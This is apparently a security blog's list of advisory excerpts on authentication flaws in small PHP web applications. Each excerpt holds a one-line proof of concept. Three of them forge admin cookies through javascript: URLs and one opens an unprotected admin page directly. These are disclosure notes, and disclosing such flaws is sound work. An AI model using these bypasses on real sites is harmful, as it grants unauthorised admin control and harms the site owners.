Star Article is a “Ready to use article, news, joke, tutorial site script with more features than you can think of”. Leads to full administration rights on the CMS admin panel via insecure cookie handling. Name – admin_user Content – admin Path – / Proof of Concept: javascript:document.cookie=”admin_user=admin; path=/” Vendor was contacted three times over [...]
Tags: exploit, web application
PHP Site Lock A highly secure website (Ed: haha) login script which has features like User Authentication & Management, Website Password Protection , protection of pdf , images , etc. The Vulnerability leads to full administration rights of the admin panel. Proof of Concept: javascript:document.cookie=”user_type=admin; path=/” javascript:document.cookie=”login_name=admin; path=/” javascript:document.cookie=”login_id=0; path=/” Vendor was contacted three times [...]
Tags: exploit, web application
Next up is Million Dollar Text Links which is a link exchange application. No authentication checks on the admin home page allows anyone to just browse to the admin contol panel and bypass the login procedure. This will allow full access to the admin panel. Proof of Concept: http://sitename[applicationpath]/admin.home.php Vendor was contacted twice over a [...]
Tags: exploit, web application
I have found a few vulnerability’s in over the last few months which I will be posting here over the next few days. In all cases I have tried to contact the application developer and have included any information regarding in the advisory. Most of them have been cookie related vulnerability’s. First up is Arcade [...]
Tags: exploit, web application